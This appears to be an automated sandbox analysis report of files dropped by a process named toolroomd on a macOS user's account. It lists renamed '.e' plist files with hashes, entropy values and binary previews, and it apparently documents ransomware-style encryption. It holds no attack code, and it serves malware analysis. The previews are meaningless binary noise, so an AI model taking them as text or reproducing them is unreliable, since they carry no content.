..9z#.u7.2..,...b.}.Y....tK?mGz....h.dx2V(../V8...{'A........_..\..5........h..N..'....ViC.m..!.o5\6..Q.W..Y....tK./)\0..pw..D63w..4...v.7.x..61.K.3[.....{&6t'."..8X...._.{.._B....)..CO'H+......2..}.Ol....s432.y...-.m+.r..............................\.........^./k..`R..V5..jd..ysVT*9.X.....wS.I3..B@...H.xB..UI.y.3.Q...KJ0z.BQ...B...L..Y$.m.DT..s.K...w[v.XV;.5T.I...U^.V...v.&.9..1..........................................................

/Users/berri/Library/Calendars/885D75D5-6C5B-4D32-A412-444F6D271C8A.calendar/LocalDefaultAlarms/.EventAllDayAlarms.icsalarm.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	594
Entropy (8bit):	6.329580729265847
Encrypted:	false
SSDEEP:	12:uicl9/hcZ/ELA+dwnKB2/m4MoiyKmtQsewLYTc+qGm7:uicldhY4binw2+D/PmSsePc0m7
MD5:	2E77877DC614F4AE11624097CDB0FEA2
SHA1:	20A788FA6AD08AC8CA2F1BE090E3A40573B207F9
SHA-256:	34235501EA219527A12F4E5E41AFEED5A58D469962FD901956D787D21CF10EEC
SHA-512:	A83F518E68D981B7BFFFF5F85F26B3E7F30A276468F069A829FB8AFED716E3D0C38B4BAD6F6B861E7EC3274AC5EE3C3F71050F26F15D4B4EF26DFADB863A4A47
Malicious:	false
Preview:	o..s ..;m.;5...Xj....>(........ec......8;w....SI.,c[%....#.\..a...R.......v_..E.I+.@...\|...[$d..B..N.9..;.9.>c....M..".F@,.e6.p..Y.>TnEy6.u....$N..b..W....YsW..........i.G..G04v\6.\|...1..Q].R..%_.$^T\|........4!i.m..`...A:..t...u.P..........WV.....J7....A[]HJ~..7.&.2.,...{7..!.................\.........^./k..`R..V5..jd..ysVT9.X.....wS.I3..B@...H.xB..UI.y.3.Q...KJ0z.BQ...B...L..Y$.m.DT..s.K...w[v.XV;.5T.I...U^.V...v.&.9..1....................................................................................................................................................

/Users/berri/Library/Calendars/885D75D5-6C5B-4D32-A412-444F6D271C8A.calendar/LocalDefaultAlarms/.EventTimedAlarms.icsalarm.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	594
Entropy (8bit):	6.2789617468939065
Encrypted:	false
SSDEEP:	12:uicl9/hcZ/ECl4PB85mNKriAEAsewLYTc+qGm7:uicldhYtlYBwyKiNAsePc0m7
MD5:	22B54AF770037B17CAE8172240490E53
SHA1:	4959B2599A0039A5D3A80944FDFE386AA5C525B0
SHA-256:	137E3AD1F8B5AC0DDF342CDCE7857B97B0907A1C72295957CD4CF0F7A3250F8A
SHA-512:	7821CDC0739EC802820ED38F61D2F532C0375E59A2DC9030DB2F11D51E6F3FFF200B18FACB8F545ACC5B8745B305ED8544B5E15B224FF055A046FD04BA50474B
Malicious:	false
Preview:	o..s ..;m.;5...Xj....>(........ec......8;w....SI.,c[%....#.\..a...R.......v_..E.I+.@...\|...[$d..B..N.9..;.9.>c.....V..lS...\|..V..ccG../.^....u}.iI+.R.c.....r}.C.....c).c..BB.8....^T......%_.$^T\|..<...............h...W_.I^3.mL..j6.?.. ...!)B....X.uz.. .C..u$..]1XX .e!w..!.................\.........^./k..`R..V5..jd..ysVT9.X.....wS.I3..B@...H.xB..UI.y.3.Q...KJ0z.BQ...B...L..Y$.m.DT..s.K...w[v.XV;.5T.I...U^.V...v.&.9..1....................................................................................................................................................

/Users/berri/Library/Calendars/A8CC2242-71EE-493F-8F44-613D5BE39E92.calendar/.Info.plist.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1074
Entropy (8bit):	7.2150168861714095
Encrypted:	false
SSDEEP:	24:Al7q6/DjmeX9aqEbiHhoTNGNPIelDeC+cWzPN6iTsePc0m7:yjzHEAhoTNGNbsC+c0PNPTNpq
MD5:	48DEB2D53B1CCC4402288254BD70EE52
SHA1:	3F8081633C2AC56671D970B00F2A5D41870928C2
SHA-256:	035C00ECB9B09CE3D28734CFE49D6017984992D3A3F7534BEBAD664781E01BCE
SHA-512:	4DF4092141D72D4C0C3D135DCE5BB679CB8D8D5513D1F9DD41CA27F36FCF72BE53A37E6D61BEB956F9763F548A18CB753D8A44F8F91DB0368B58F87CCAC955CF
Malicious:	false
Preview:	.....0..wMv..T.I.O.p%.E..L#...z`...}...._..}.kdD.A....."..,....<....w.4.h..........up..H?..8..\9......<...d./....3.j.`..O......^.G\..9..LL..{IX.#...>#,.R.3jE0...Py.Ndi~C........9[...II{.Y....tK./)\0..ptf...f.~!+.X.\|0.#.,.....r..`..Uu..)..(.oL(.....,.@3g.B.e.........;..........s432....S...G.....UL"....m..o....T.2.(!M...W.@.'......U.n),...U.......FHu...i..~E.v...7.mR.l<r..4....2D:....5.@.N....L..?.D.$.f..73.s.h.Z..].>.c..@..q...u.J..^..N...B..g=....".VB/..;.Y....tK..G.Z.k...p2..+......"g.v..kS.-....f..iC....o.h.c.e!y.y.....j..._U..i..[....W../..v....B....2.I8........Bh.>.\|`..U.....,....i-.1.v...G4;.Z.Yl..#S..D..O.x...N._U..i..X._...3...!...LzO........y.\|.![.o..D..4......H..(.oL(..>..oN%F..y.\|.![....u._.3,Vz.k..._..s.....$.w3..dp_>+.....................\.........^./k..`R..V5..jd..ysVT*9.X.....wS.I3..B@...H.xB..UI.y.3.Q...KJ0z.BQ...B...L..Y$.m.DT..s.K...w[v.XV;.5T.I...U^.V...v.&.9..1..........................................................................

/Users/berri/Library/Calendars/A8CC2242-71EE-493F-8F44-613D5BE39E92.calendar/LocalDefaultAlarms/.EventAllDayAlarms.icsalarm.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	594
Entropy (8bit):	6.345416173801103
Encrypted:	false
SSDEEP:	12:uicl9/hcZ/ENNYGWOUoiyKmtQsewLYTc+qGm7:uicldhYa29//PmSsePc0m7
MD5:	9B1A5AF2A9E9EE6284BFAC6288C4E71B
SHA1:	47966DF1D4B784FF20F40A4A37B9AB64ADF63CA7
SHA-256:	2B49C6A03F6C16FD7A8EC7547BF35A84B0E7F9081D97823D857E7F7BFD26B6D0
SHA-512:	8852C7BE7B9A6E30642C268087055807053F490AB77CBD171EBD83B2DBCD60B38CEFE094EE8AF0B844EC257F553CD7FC66F0F5C7F5D9293A97565FB5452411E3
Malicious:	false
Preview:	o..s ..;m.;5...Xj....>(........ec......8;w....SI.,c[%....#.\..a...R.......v_..E.I+.@...\|...[$d..B..N.9..;.9.>c....a..y..!7h..B.......z.....`KT....V..\|..\2.Z....D...n.....vNg.].=..t....h.P..dP..%_.$^T\|........4!i.m..`...A:..t...u.P..........WV.....J7....A[]HJ~..7.&.2.,...{7..!.................\.........^./k..`R..V5..jd..ysVT9.X.....wS.I3..B@...H.xB..UI.y.3.Q...KJ0z.BQ...B...L..Y$.m.DT..s.K...w[v.XV;.5T.I...U^.V...v.&.9..1....................................................................................................................................................

/Users/berri/Library/Calendars/A8CC2242-71EE-493F-8F44-613D5BE39E92.calendar/LocalDefaultAlarms/.EventTimedAlarms.icsalarm.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	594
Entropy (8bit):	6.309160943913407
Encrypted:	false
SSDEEP:	12:uicl9/hcZ/EW2mANKriAEAsewLYTc+qGm7:uicldhY12pKiNAsePc0m7
MD5:	6EDCCF6AFB4D0BB145DBE91493474945
SHA1:	F798E8122081D435780DD9B373ABCF62F8444A08
SHA-256:	2E5A01D3FD6F5172EBDEC507751E59C9B6A1801036CC8E4B57D5970B3BD42C38
SHA-512:	C5A24E701BAE30DC3DD9CA85CC357B9933FB24AF88C467D56786704AE43BF38DDF44E6039409EF410C28825B20222555C8F02D0409D7853FB3C71E03D1B345D0
Malicious:	false
Preview:	o..s ..;m.;5...Xj....>(........ec......8;w....SI.,c[%....#.\..a...R.......v_..E.I+.@...\|...[$d..B..N.9..;.9.>c.....'.2...g<p_.dW..Kn../..RUVP.y...'..?.F~..C...[..l..\.r...,.....6..Qkb.~6..%_.$^T\|..<...............h...W_.I^3.mL..j6.?.. ...!)B....X.uz.. .C..u$..]1XX .e!w..!.................\.........^./k..`R..V5..jd..ysVT*9.X.....wS.I3..B@...H.xB..UI.y.3.Q...KJ0z.BQ...B...L..Y$.m.DT..s.K...w[v.XV;.5T.I...U^.V...v.&.9..1....................................................................................................................................................

/Users/berri/Library/Calendars/F2222F47-AFA4-432D-95E1-D04C03536848.calendar/.Info.plist.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1098
Entropy (8bit):	7.269115673924417
Encrypted:	false
SSDEEP:	24:Al7q6/DjmeX9aqEaqHhoTNJwXiYtQphT00FIp3+sePc0m7:yjzHEakhoTNwisGT00FG+Npq
MD5:	652B01F92FF20AD1FBC777DE66403774
SHA1:	398E4CD6061F5BE94C217A9BEF9EAC5C82760609
SHA-256:	CB5C69641EC4DA1F209BA2586B4C049BE5E16DCBBC74CBD37643C7C739D1C06C
SHA-512:	A19FE0905ED22FDA82FCD6DBE652A047DD4F59E35B372B59C22B05586533C6B1ABD9A8551C650178ECE49AA819B1BFF7AC361D8C68C8142D65E25A824910A10D
Malicious:	false
Preview:	.....0..wMv..T.I.O.p%.E..L#...z`...}...._..}.kdD.A....."..,....<....w.4.h..........up..H?..8..\9......<...d./....3.j.`..O......^.G\..9..LL..{IX.#...>#,.R.3jE0...Py.Ndi~C........9[...II{.Y....tK./)\0..ptf...f.~!+.X.\|0.#.,.....r..`..Uu..)..(.oL(.....,.@3g.B.e....."....WB8t..M...s432....S...G.....UL"....m..o....T.2.(!M...W.@.'......U.n),...U.......FHu...i..~E.v...7.mR.l<r..4....2D:....5.@.g.{e<p..\....d............^.B.6..../t......;..`.1.v...G4;.Z.Yl...8.....Q\|.I...z...-.....5.I}sw.....yq...6..........0%.z#.u7.2..,...b.}.Y....tK?mGz....h.dx2V(../V8...{'A........_..\..5........h..N..'....ViC.m..!.o5\6..Q.W..Y....tK./)\0..pw..D63w..4...v.7.x...K.Y..Xm......&..............y..~...91.5g.s..>._U..i...<.q..(.....obq&.!q ...m.......r..<;bx.......................\.........^./k..`R..V5..jd..ysVT*9.X.....wS.I3..B@...H.xB..UI.y.3.Q...KJ0z.BQ...B...L..Y$.m.DT..s.K...w[v.XV;.5T.I...U^.V...v.&.9..1..................................................

/Users/berri/Library/Calendars/F2222F47-AFA4-432D-95E1-D04C03536848.calendar/LocalDefaultAlarms/.EventAllDayAlarms.icsalarm.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	594
Entropy (8bit):	6.358255507846655
Encrypted:	false
SSDEEP:	12:uicl9/hcZ/E7AD+W6Dmg4oiyKm8phsewLYTc+qGm7:uicldhYgAaw/Pm8phsePc0m7
MD5:	AD59CE0EE18E1CCC50DFB928C10E312A
SHA1:	3E1428E4709DEC4694C4E3A3F4A12D05CD31E500
SHA-256:	748889C7FC0B5B67BBCAD083B59243091EF196D6B2CE605920BD71E696A32A1F
SHA-512:	49CB5FC4BAE31A6CAF69010D410CC6832043FAED993ACE11DF49CE5DE95B093DB468C9B095E33CF1EA4B4700712AC1B985EDA90BB7559E052145F0536C8B735D
Malicious:	false
Preview:	o..s ..;m.;5...Xj....>(........ec......8;w....SI.,c[%....#.\..a...R.......v_..E.I+.@...\|...[$d..B..N.9..;.9.>c....qv.....@.k.EX.;n..".a...Z.Lx.O..1.5xx.......#&.= ...:.^.......9...f..j..._...M.%_.$^T\|........4!i.m..`...A:..t...u.P..........WV.....J7....A[]HJ~..7.&.2..I...O..!.................\.........^./k..`R..V5..jd..ysVT9.X.....wS.I3..B@...H.xB..UI.y.3.Q...KJ0z.BQ...B...L..Y$.m.DT..s.K...w[v.XV;.5T.I...U^.V...v.&.9..1....................................................................................................................................................

/Users/berri/Library/Calendars/F2222F47-AFA4-432D-95E1-D04C03536848.calendar/LocalDefaultAlarms/.EventTimedAlarms.icsalarm.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	594
Entropy (8bit):	6.330569528092654
Encrypted:	false
SSDEEP:	12:uicl9/hcZ/EgdUD/uSdNKriesewLYTc+qGm7:uicldhYGuSfKiesePc0m7
MD5:	5556DF4FC6BCEBC5CF9582EA2F6114BC
SHA1:	67771CBC1183525B496A9ACE2056110205F36908
SHA-256:	37F9C34D835DD76DCB7F72AE125124A76AC7B7D79E041F32AC5FD7249DCED2EE
SHA-512:	245D4AF97069FC586DBF472CB3D5063EF0C679BA45071EAD0EA79AB8335D976590008242219B60C6C7AD9E86B7C7C7F838AB3176691118DABB0AA85039B484EF
Malicious:	false
Preview:	o..s ..;m.;5...Xj....>(........ec......8;w....SI.,c[%....#.\..a...R.......v_..E.I+.@...\|...[$d..B..N.9..;.9.>c.....[.&z...D.k.uCi..C.............8.-i.f....z.D...<.8^rD...nc.\u..}d.1O...?r.%_.$^T\|..<...............h...W_.I^3.mL..j6.?.. ...!)B....X.uz.. .C..u$..]1X.Tgj.....!.................\.........^./k..`R..V5..jd..ysVT9.X.....wS.I3..B@...H.xB..UI.y.3.Q...KJ0z.BQ...B...L..Y$.m.DT..s.K...w[v.XV;.5T.I...U^.V...v.&.9..1....................................................................................................................................................

/Users/berri/Library/Containers/com.apple.AddressBook.ContactsAccountsService/.Container.plist.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	31299
Entropy (8bit):	7.964820645426228
Encrypted:	false
SSDEEP:	768:oRDo+XAiOdCK8FJnpKAc1De2xoKxryJGNfAGMfjHZrOjQC0LP25ox:c0+DJnp2xo8FxAjQjb5ox
MD5:	52B7FB01788CB808C75F78B865729EDB
SHA1:	7601EC37419241DF3BF3572CF88E1495A4994AAF
SHA-256:	2726E5C81201B2338ECA5E400FA84DBD54F8579606082FE4DA8C3709DF942676
SHA-512:	F99F028A1D01FAC896A66D4596F0FE457B305060533502969153B4C314026A9AA500D9CBFE2272307D364CBCD34C34668EFF9BC4F44A33BADBC4E2339BD59679
Malicious:	false
Preview:	...a>k...6...\..<...5y.[M.An..ym....x.R}.......gO[n.=i.YP...(.&..053..H..0].-.1.F.}....g..X.........L......C....jk...?....X".G...1........!...b....."...wV.&.^..t"..,G;j.._..P_..o...8.8.fr.i.Fn..\|.._..o...8_..o...8^....q...LyUf.s......&I..C.....Ek.b..7FN...=...l.tJ=.L.:F.>..iT.jt..#:..FHj..I......C6.P.:Nj.br...w..C..6T5-".m?J^....Ek.b..7.Ek.b..7S0.!..}!_..o...8.Y.I.._..o...8.u..W..`.......G.A...II.._Y.)...P.0..?.iy..g...S,.&>.G..qV. vd.,....\..I..%$..2sf...>b...54......t@............S.+YV.....s..{..U...U..@,XY...'.B..Ty......vz..GW..& P...b.f.l.FU.RH$...Rr.=R.M..?.B..\|..U.6(H)\|..N........E(.>.%X.i.K.....psp.4.R.;.$...R...q...s.A...h.5.ES.....p......z.GU. .d..b.J....+......>.:0:\h..n.....E>1.3.....`.. .d..b.JE?.<....Ap..ZU...^.i.=.....I.....s.{...;^...k.2&..u......?.R..........UD..5\....Sz..s.0\|.S.o>T...9v&.bF..2....V.....5.......<.\T........s.^[.(.N.CR...y.yh..c.'.J.p.CB-.....F5jET..Nt4.g. .&..0.....Ir.af..X}..[..y.Q.{...X......0

/Users/berri/Library/Containers/com.apple.CalendarAgent/.Container.plist.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	39708
Entropy (8bit):	7.964964155773935
Encrypted:	false
SSDEEP:	768:BK0tHVectBjE5cloUXMzAsLCb8BKyQxicaLjCxkqBvAD/meyp:BFcctBjEYoU2An8BK9kjuNZp
MD5:	C8B870FB0694D6EEE5951852DB86534F
SHA1:	4A351B868A09B127E6DFCE57D985B6027BD4139E
SHA-256:	8FFB7AA31A6289C1654CC09A98FBA06BB2968362F20C7C5C4B79C14C30CD3E76
SHA-512:	BE7D452FCABF41CAB8E2604CE06A788636B52244413D295F92F6BD307C3D963010C39AEB142D389CF01BB0711AED3C41BABF9A5F7ECFDF0CF32F55B14B79E3F6
Malicious:	false
Preview:	...a>k..M.........;..I.<...5y.[M.An..ym....x.R}.......gO[n.=i.YP...#}.,....._.......-.1.F.}.....VD..........U.4.{..8c..4.........<!pu..;....).w..d...I8.....Q3.b3...\.....D...1=...M...&u.O.qv..8vB.uZ./y.M...&u..M...&u.SNv...dw!..V^.....=...{8{..8c..4.Z..z..5.i.....]{.1..{.....H$..?..P.....7...idX[.\.L. .37x....,5m.\.....EC.q........Z..z..5.Z..z..5R...b....M...&u.B{ ..M..H._...f;..I....^^.:.~/..h.x..=.D.....".L.mh.%..!....i....V...v....wo.p.Q;dxH_.'.........R.V.=.....c4?....vw.kB..G..AY.;]...{.~.....D............1I{...m.S`C..<.JA^.M.G5.....#..%......h..KK.U.m..7.%EbGl/gF...%.XO..9d6J..4i.0...Y.....'..@4*.....f..2W>...J.0?..\|:.E(.>.%X-......N.Vn....0..A..Z.LB......~..m..O...7\|.._..."......N...N..Qh.......v......I..K. 8.+....S....`.../.C...Qh.....Z-.....Z...a.....P...?.p.a..!..%...!..3.>..d.....Dg.)..zgX.oH......R......U,.&^I._...1..l....R#xT...9v&.T..Wh#.....B..W.Tg........xa...C.&.......I.^.RN@1..0.(....?Ir.af..X_t].....b..4\|..

/Users/berri/Library/Containers/com.apple.CalendarAgent/Data/Library/Preferences/.com.apple.CalendarAgent.plist.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	378
Entropy (8bit):	5.127549017866728
Encrypted:	false
SSDEEP:	6:Uq+9zJbPAGPmcJg9BzsewLYHEec/LaqG8rQQwiQ/6:Uh9VbPuM8sewLYTc+qGm7
MD5:	126A090A8ABA6E0532EAFEE92F640811
SHA1:	C1784118DFA189CEC951DFD81926F0A1CAEF814A
SHA-256:	FCAE0704DD5DF69D7CC6FCA91A7728A18DB8BFCBF0B8E96A1EC8C3284B76035E
SHA-512:	13F5DE312640CAC5D8E3A1A55067F71A18767E775B04EF29C6D8CAD08BF3850D4BF9F7B5BAFE30C5AC1169ABC962D5EC93FBC2955E79310ED30622CFCECECA07
Malicious:	false
Preview:	...a>k.....C..9...w...3a.....'..8..G:.....y..)..X.....6<.."a.....jTp..I.................\.........^./k..`R..V5..jd..ysVT*9.X.....wS.I3..B@...H.xB..UI.y.3.Q...KJ0z.BQ...B...L..Y$.m.DT..s.K...w[v.XV;.5T.I...U^.V...v.&.9..1....................................................................................................................................................

/Users/berri/Library/Containers/com.apple.CalendarNotification.CalNCService/.Container.plist.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	37076
Entropy (8bit):	7.965444243523965
Encrypted:	false
SSDEEP:	384:9o7AqbpyMYo02391NOi7lL5c/GjJ4QRaI1SjfVsvg8lpVFAB34Be1VwTr10s/xI+:9DBE1HAjVslp/ABIBbTh0sqxJ94kP18
MD5:	6B121BDC1BA5B823CD06A52C4E95ABEA
SHA1:	4FCF98FB9D68E692BDB54918677447CD8551E46C
SHA-256:	DC0D35DE6178C670A71C93FF16F4E0541894CCFC5EC69273529AF8A3F657A516
SHA-512:	A129D8F3BB61703AB0FCE3D63D1E059DADC122CC4BBFC4337D1912E09E4D7CEFC7A6EEAC51DECB0543680B48CC0B184DE3B9DFDDEBF9F6CD2BC37C493A9254E3
Malicious:	false
Preview:	...a>k...6...\..<...5y.[M.An..ym....x.R}.......gO[n.=i.YP...(.&..053..H..0].-.1.F.}.......N.x.......>.:..i.~..w.....&...B.J......3..........U..6~...3.b3.....l...:.a. ..c.]Y.J.:..B.a.9K.....+....jY.J.:..BY.J.:..B=....!.!..V^...>u..'?.i.~....`f.....{...G...........o.\...^.......Q7.....T..pFf....).M...Z....Fg......9.9....`f.....`f......4....Y.J.:..B...f@.a....\|..F.!:..h....5d..R.mb.D.t4-.........A..jP.d\@.}..!..... q....W..W....!P0`P.. <....n.c..Ah..A.c4?....v.V...O'..4.^....?i5=.v.b.[8....-.B5..........Bux....(.....^...\......zj:.....mg..e.0.'L#....F.S...9.......S....).......(u=. A(~..q.(x.Z...4."1T6...X.f.q,... ....E(.>.%XC...#..qy...#./..{.......A.t......Wc..)-....V..R.<...,.F......q..89Wp...si..N4........&.X.g..b[..9N..R.[MI...q..89...+h.Ia..........&aM.{9..J.(.T../....Q...P....`......^.3..}.m..jlDK../..B4..$..!.FIn...0...E....T...9v&...)yS*Zd...}...'CT.^$-.....a)%a...C.&..t..\?B.d..5}.N.C[....1Ir.af..X..5..b..4\|.....^....

/Users/berri/Library/Containers/com.apple.CloudDocs.MobileDocumentsFileProvider/.Container.plist.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	30707
Entropy (8bit):	7.961987400111294
Encrypted:	false
SSDEEP:	384:yWAvtVkgHxU35Ehlt11oyvcUDaWCarwxbCI8S5FAZD+sWULw5ephfH:yWAFV1RUE4ViSrAZMYPh
MD5:	0D9F9AF74F9B716FFF3A16388B4EA029
SHA1:	ED00BCC3FC9E16713E5D61C944B1ABAAEE175B6C
SHA-256:	FF3440B5606D3ACD0EE202A3ED12C382A5548F13E3836F979AE7A4ADCA8D1EB2
SHA-512:	B37CA30DD2B134BED6EFB5AA4C2106EF00FFCEE9D981F137DB3B2E0A6FBEDB668DAB728EFAB4D3290F03C13B61B23C8B4EA998ABA326752EA9D0E1607ACE5A70
Malicious:	false
Preview:	...a>k...6...\..<...5y.[M.An..ym....x.R}.......gO[n.=i.YP...(.&..053..H..0].-.1.F.}..\GM..q.d....E.g#.:....&>9u........7-..8.\|.. ...J..^h..[.^.........b.O....;......BPS..(.l.B7..s.WNG.i..v.Ol....0.7..s.WNG7..s.WNGi,N.I..1A...~.r3n...8P..&>9u..$..L.v.W3..\..(.ne. ...H..u.T....js`......L....a$..Y.?..=.en.U.....9...a,..(t..$..L.v.$..L.v.mG..\|J.'7..s.WNG...B.{.'7..s.WNG...@K.3o.i.MW.rc..yF.j...<=.e.Q.B...z.;d...$.c..h.Lo3...!7.....)._..;.\..I..%...SDk.`.....x...zS)t(.HM..QZV6.l>C.O.:[.>+.K.#Dn./m:..fg.....'...-...88....&.NI.r\....W^/.x.+Ji..\.>:..6}E_...h..qBa..P.E(.>.%X...p......by....H..~...9R3_6+If...o.a.%..l..w......C...qE!S.Q..vk.........>......l....p..`.......C...f..E...m.o.W......I.zDO%.&.&...bt...o..w^.A....6;O._......iA.H.....__K.%.:~.2&.....FF.0.....wTT...9v&..F.}x.......nP...d[.}voh......G.....*L&j=.^...<.J&.j..,....8.j@i...(....:O.].lM...#....c..+o...p.iY.uHw.........%.:...9.=0M.r.m`..R.N.....W..ERi......\C....,".Br2.

/Users/berri/Library/Containers/com.apple.CloudPhotosConfiguration/.Container.plist.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	32099
Entropy (8bit):	7.958874774190172
Encrypted:	false
SSDEEP:	768:WyWoM/ZdKiZfRctCzdMswMRGhrjIcvHLt/eziJbmZrAk2vh0I:W15OCzJPRoI+8ziOF2veI
MD5:	EE68EF301681A899627A262ABA11E225
SHA1:	375FD51EE5763BC3AAA88E49A1555606FF4DE926
SHA-256:	8BB66F1D07616A37D4BC46BBD51483E9A1F452D3CE462F587764DF690E302260
SHA-512:	2B76F882C6C2070D5E1DBF6232F54F9A98F2062F171C8BA9744107CCCDFBBC39CD596CEDE17EC28ADAE2C7C752C42FBC1D6E0164C9646383058F6517CD505F68
Malicious:	false
Preview:	...a>k...6...\..<...5y.[M.An..ym....x.R}.......gO[n.=i.YP...(.&..053..H..0].-.1.F.}..{.....Kv<..q.7.=0.vx....Wa.K........Cg ..+vT.,...p..4.)..?...).o..O....;..n..Q..3Y_-'......+.3p...69.YT.6........+.3....+.3x..f......t...+...b..,......WaR...&..=.H..\|....x....+mt.n......I...!%.T"...-..P{.8<.8.]?....-.Kxa6.L.k..s..,f.J.g.4.JR...&..R...&....?...x....+.3......W0....+.3.F.=.. .4UO...+..j...6O.s.64....Jp..If.w....\|.H....+i..f.C.W....z.h.\..I..%.......i.....`z%..i.Wa.,cq...z`.`.G....u...J......3..6..{......J.me.K...)....o..a@.'7.#..U\.@.e..s..!s.q.K.~.J.f!.F.3..I._T.4^..q4.E(.>.%X.....-.Lc!{$..`....._.U.O..z.o_z.e.o..%....f(i....p7.....L.\%..g...;8..+...-...dc).....f(i.....(W#....V..D...7.."..zn..f..FfB..>..dL.;e)?.s./.J..ok..m=...]..=....36..`...&A...nO.\|.w.<.)^T...9v&.evl{.-.#JG.WN...?v..}e..W.@.N.....*L...Hc.n..<.J&.j.m....W.8.j@i.....{-..O.].lM...PD....I.;f.........[.d..l.2...[...$.QMo~.bH..}Cj....D)..M.....(.A....:<yj...h^.-

/Users/berri/Library/Containers/com.apple.CloudPhotosConfiguration/Data/Library/Preferences/.com.apple.CloudPhotosConfiguration.plist.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	394
Entropy (8bit):	5.233584793471745
Encrypted:	false
SSDEEP:	6:Uq+3UQAfR+KjdsleqBzsewLYHEec/LaqG8rQQwiQ/6:Uh35A5+odsDsewLYTc+qGm7
MD5:	B1343763F72610BBA129A76258717F3B
SHA1:	B514F50294E3D25B5F0232A1B4C63A8EB219B8DA
SHA-256:	27A40D6D91BDBB44353D06858D3B711EB2C5D9F4F6D2B199B466ED5180B13A5C
SHA-512:	AD34B8EEF2E9E5118C345F6499D99BBB3D8D0DC4B8A7382348F433944A8952DFD3E2B64C7AFF1E6F9161004FD02413CC4461659473F6280C0B0C7576E4B12A59
Malicious:	false
Preview:	...a>k..)..4@.H............u>.%&!....\|.n.L..i.Q`...\|.d.w.}.O..fW=.NT.St....Sq.@...P..Y.................\.........^./k..`R..V5..jd..ysVT9.X.....wS.I3..B@...H.xB..UI.y.3.Q...KJ0z.BQ...B...L..Y$.m.DT..s.K...w[v.XV;.5T.I...U^.V...v.&.9..1....................................................................................................................................................

/Users/berri/Library/Containers/com.apple.ContactsAgent/.Container.plist.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	30523
Entropy (8bit):	7.960780109821144
Encrypted:	false
SSDEEP:	384:LNugfj2d+L8PCy2m4vcURNcxh69a7I1bONDFwYgrCbAiBg4msY0/tIH+F6Nw7F+K:Rr2dLElUBwYgrkAiBgG1IH+F6yR+pE
MD5:	AFE3BDC11AA71F2995EC49520C7A180D
SHA1:	2AF3FAB0EDD9E0BEE27007A4DB9080396FD2B52A
SHA-256:	074D8CAD730801754DBEE5FA6EAEBFC6AC42D0248593C042736DE4289305AE32
SHA-512:	4ECDE904ABE3D95FE9DC652952CFE8A8C11680CC3EF16524060286DD44860CB65F2AB5EE8599DFB28EEF63D0A00F0152D0D3DEC5C14FC5CA787F1A3DF4685430
Malicious:	false
Preview:	...a>k...6...\..<...5y.[M.An..ym....x.R}.......gO[n.=i.YP...(.&..053..H..0].-.1.F.}$.cIx\|.@..w(.......6....{=...d.z...+..r.C..I=.~C.....>.@......I..r.D{.;<...s../G.Q.Tb.........8.U.\|.AX.< ..\|..!R....8.U....8.U.f...h.Z%p....=..HR.+j..{=...d.w...#S....1..7....V.p.....\o...Q..cQ....S.~.q.Y.p....Q.......{.!k.....xX.......Q".h.w...#S..w...#S...m..h(...8.U.b.7.%......8.U.5.,....G.{.TA..Q.7.....&....-...I.%.D...z...l..)....t?...WO..\|..7..g.\..I..%.u4L...<B.(a/..6...rs.5.4J.(R ..h{.V./\O.AL.}..O'N.7..F.$.m.a.?'..A....U.g..h`.Y_M.b,.5j...g..(....u.1.M...).......%<<..8..b.7.z.......7.r.E(.>.%X..._....p...i.<...M..I.'8...yo.....HA<e..p.C..>(..........}D.k.I...7.\|..`...yv.!..4..,...0...K.....}D=.o.g...@..e....?....C_D..N..i..C..xW....4U.."i....V....%...X....j.&.....G..i.._...=..Q.TW.t...tD{.....w......IZ.e.w[.A.?.~{.!E..FdzG}...&....Z.1o........#......1.#cc.=k$N.Qa...G...m`.`.....Vrd(Y"\MN...y.F.(s<...q.........a.S.].w-.(.F.M.4.I.G.......:qu

/Users/berri/Library/Containers/com.apple.DataDetectorsLocalSources/.Container.plist.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	31603
Entropy (8bit):	7.96262249700992
Encrypted:	false
SSDEEP:	768:UnHK3831JSrpF1ej+vsy0DtRTDyfMoraAMkBkMmT4fjIR94gP:UnHKM31iHs9HiEA9i740
MD5:	DC6A3071829CA257FBDA94771AD51EE6
SHA1:	E3F63E6400F365E90F24F3C74FCC0847E63408EC
SHA-256:	21259B4DEBD83FB7A6C6467674BCE51BF6BAD817DA3B23A463DDACB5E5B168D0
SHA-512:	A35800AE867FCBF393F009C3CD785897DAD5B9B09C794C3321F7AC1C88DE572508152B7A7343B937D85C9057151E9C7E80554CC2133CDA5A5D03B5BD040CBACB
Malicious:	false
